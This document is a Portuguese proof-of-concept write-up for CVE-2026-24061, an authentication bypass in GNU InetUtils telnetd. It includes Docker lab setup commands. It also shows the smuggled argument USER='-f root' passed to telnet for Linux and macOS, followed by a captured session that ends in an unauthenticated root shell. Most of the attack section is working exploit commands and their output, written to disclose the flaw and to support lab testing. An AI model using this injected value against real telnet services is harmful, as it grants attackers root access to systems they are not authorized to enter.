
GNU telnetd service from GNU InetUtils authentication-bypass
Em janeiro de 2026, o serviço telnetd do GNU InetUtils foi identificado como vulnerável a bypass de autenticação por Kyu Neushwaistein (também conhecido como Carlos Cortes Alvarez). Registrada como CVE-2026-24061, esta falha permite que um atacante estabeleça uma sessão Telnet sem fornecer credenciais válidas, concedendo acesso não autorizado ao sistema alvo. A vulnerabilidade existe até a versão 2.7-2 do serviço telnetd do GNU e parece ter saído diretamente dos anos 90.
Esta é uma vulnerabilidade de injeção de argumentos (CWE-88) com pontuação CVSS v3.1 de 9.8 (Crítica).
Referências:
Compile e execute:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
Após o serviço iniciar, o telnetd ficará escutando na porta 23.
A vulnerabilidade permite contornar a autenticação injetando a flag -f na variável de ambiente USER. Quando o telnetd recebe um nome de usuário que começa com -f, ele o repassa ao programa de login, que interpreta -f como uma flag para pular a autenticação.
Use o seguinte comando para explorar esta vulnerabilidade e obter acesso root:
# Cliente Linux (requer a opção -a)
USER="-f root" telnet -a 127.0.0.1 23
# Cliente macOS (nenhuma opção -a necessária)
USER="-f root" telnet 127.0.0.1 23
Após a exploração bem-sucedida, você terá acesso ao shell root sem fornecer uma senha.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)